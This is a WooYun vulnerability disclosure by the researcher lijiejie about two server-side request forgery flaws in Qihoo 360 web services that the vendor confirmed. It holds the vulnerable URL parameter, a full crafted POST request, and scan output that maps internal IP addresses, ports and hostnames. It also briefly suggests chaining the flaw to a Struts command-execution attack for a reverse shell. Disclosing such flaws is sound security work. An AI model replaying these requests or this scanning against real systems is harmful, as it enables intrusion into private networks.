利用两个鸡肋SSRF探测360内网

编号83592
Urlhttp://www.wooyun.org/bug.php?action=view&id=83592
漏洞状态厂商已经确认
漏洞标题利用两个鸡肋SSRF探测360内网
漏洞类型设计缺陷/逻辑错误
厂商奇虎360
白帽子lijiejie
提交日期2014-11-17 15:46:00
公开日期2015-01-01 15:48:00
修复时间(not set)
确认时间2014-11-17 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank6
厂商评级
厂商评rank7
漏洞简介
利用两个鸡肋SSRF探测360内网
漏洞细节

两个SSRF都比较鸡肋,但仍值得一试。
第一个SSRF位于:

http://te.tuan.360.cn/checkapi_ajax.html?apiurl=http://soft.corp.qihoo.net


只能返回HTTP Status。可以探测指定的端口是否开放web服务(如80,8360,8080,8000),以及相应的资源是否存在。
第二个SSRF位于diy主题:

POST /diy/sl/themes/getpreview HTTP/1.1
Content-Length: 862
Content-Type: application/x-www-form-urlencoded
Cookie: sc=52cfa2a2123cceed13f31e75.THEME.1
Host: meihua.360.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
data=%7b%22banner%22:%7b%22url%22:%22http://img1.mobile.360.cn/c0/cdn/baibian/themeResource/image/banner/2655e631-ed27-4d1e-9e14-76a91c50b528.png%22%7d%2c%22default_lock_wallpaper%22:%7b%22url%22:%22http:%5c/%5c/220.181.156.221:8360/favicon.ico%22%7d%2c%22incharge%22:%7b%22color%22:%22FFFFFF%22%2c%22size%22:18%7d%2c%22status_bar%22:%7b%22url%22:%22http://p2.qhimg.com/t01e34730d2f2f6a5be.png%22%7d%2c%22txt_clock%22:%7b%22color%22:%22FFFFFF%22%2c%22size%22:64%7d%2c%22txt_date%22:%7b%22color%22:%22FFFFFF%22%2c%22size%22:20%7d%2c%22unlock_button%22:%7b%22url%22:%22http://img1.mobile.360.cn/c0/cdn/baibian/themeResource/image/unlock_button/837bad4f-ed18-41fd-b2f3-4faa1b5fa9fd.png%22%7d%2c%22unlock_button_selected%22:%7b%22url%22:%22http://img1.mobile.360.cn/c0/cdn/baibian/themeResource/image/unlock_button_selected/c2ea4be6-c76f-4cfb-9573-a5c3e7617742.png%22%7d%7d


default_lock_wallpaper.url等多个参数均可以构造。可以把我们指定URL的图片合成到一张新图片上。

POC

对于第一处,简单示例获取C段对应开放8360的主机。得到:

http://220.181.156.34:8360	返回200
http://220.181.156.35:8360 返回200
http://220.181.156.41:8360 返回200
(中间全省略)
http://220.181.156.64:8360 返回200
http://220.181.156.100:8360 返回200
http://220.181.156.102:8360 返回200
(中间全省略)
http://220.181.156.106:8360 返回200
http://220.181.156.221:8360 返回200
http://220.181.156.227:8360 返回200
http://220.181.156.241:8360 返回200
http://220.181.156.244:8360 返回200

http://220.181.156.8:8360 返回404
http://220.181.156.18:8360 返回500
http://220.181.156.36:8360 返回404
http://220.181.156.37:8360 返回404
http://220.181.156.38:8360 返回404
http://220.181.156.40:8360 返回404
http://220.181.156.65:8360 返回403
http://220.181.156.107:8360 返回302
http://220.181.156.108:8360 返回500
http://220.181.156.109:8360 返回302
http://220.181.156.119:8360 返回403
http://220.181.156.120:8360 返回403
http://220.181.156.122:8360 返回403
http://220.181.156.159:8360 返回401
http://220.181.156.173:8360 返回403
http://220.181.156.124:8360 返回403
http://220.181.156.176:8360 返回401
http://220.181.156.210:8360 返回403
http://220.181.156.219:8360 返回403
http://220.181.156.228:8360 返回401
http://220.181.156.242:8360 返回302
http://220.181.156.243:8360 返回401
http://220.181.156.247:8360 返回401
http://220.181.156.248:8360 返回302
http://220.181.156.249:8360 返回302
http://220.181.156.252:8360 返回401


比如,我们可以探测那些外网无法访问的资源。
地址http://soft.corp.qihoo.net,ping之后得到10.108.79.189。正常情况外网肯定无法访问。但是漏洞1可以探测到目标主机的,并且返回的是200,如图:

360_soft.corp.png


提示XML格式不正确,说明已经下载成功。
扫一个C段,继续探测内网开放80端口的主机,得到10.108.79.189段大量80提供web服务的主机:

360_10.108.79_HTTP_80.png


8360端口的web服务也很多,不再截图。
利用这个漏洞可以盲打内网,限制极大,例如尝试利用structs命令执行漏洞反弹shell output回来。
下面继续说第二个漏洞。它的作用更鸡肋,帮我们把Server能访问到的web图片合成出来,搬到外网来。尝试合成内网几个favicon.ico的时候遇到点问题,似乎并未成功。
节约时间,就找了几个外网无法访问的资源来合成。仅说明问题存在:

220.181.156.102:8360/favicon.ico
220.181.156.103:8360/favicon.ico
220.181.156.104:8360/favicon.ico
220.181.156.105:8360/favicon.ico
220.181.156.106:8360/favicon.ico
http://img1.mobile.360.cn/c0/baibian/themes/images/origin/preview_resources_1416203408887_1416203408887.jpg
220.181.156.107:8360/favicon.ico
220.181.156.109:8360/favicon.ico
220.181.156.221:8360/favicon.ico
http://img1.mobile.360.cn/c0/baibian/themes/images/origin/preview_resources_1416203645372_1416203645372.jpg
220.181.156.210:8360/favicon.ico
http://img1.mobile.360.cn/c0/baibian/themes/images/origin/preview_resources_1416203759520_1416203759520.jpg


如图,可以看到220.181.156.102:8360/favicon.ico的模样:

360_favicon.png


修复方案

过滤,限制

状态信息 2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-17: 厂商已经确认,细节仅向厂商公开
2014-11-27: 细节向核心白帽子及相关领域专家公开
2014-12-07: 细节向普通白帽子公开
2014-12-17: 细节向实习白帽子公开
2015-01-01: 细节向公众公开
厂商回复感谢您的反馈,正在通知相关业务进行修复。
回应信息危害等级:中漏洞Rank:7 确认时间:2014-11-17 16:18
Showing 1-10 of 10 items.
评论内容评论人点赞数评论时间

牛老大,武哥想你了……

老笨蛋02014-11-17 18:14:00

洞主上班好闲啊,整天刷rank,涨的飞快,牛逼

greg.wu02014-11-17 17:01:00

直接进东哥办公室,然后上网渗透。

wefgod02014-11-17 16:25:00

好吊,想送你一辣条。

黑吃黑02014-11-17 16:17:00

前排

泳少02014-11-17 16:14:00

吊!

debbbbie02014-11-17 16:11:00

好厉害,我只是社工进去了下798旁边的大楼

爱Gail02014-11-17 16:10:00

好吊

龍 、02014-11-17 16:09:00

好吊,想送你一辣条。

摸了你02014-11-17 16:01:00

前排~

低调的瘦子02014-11-17 16:00:00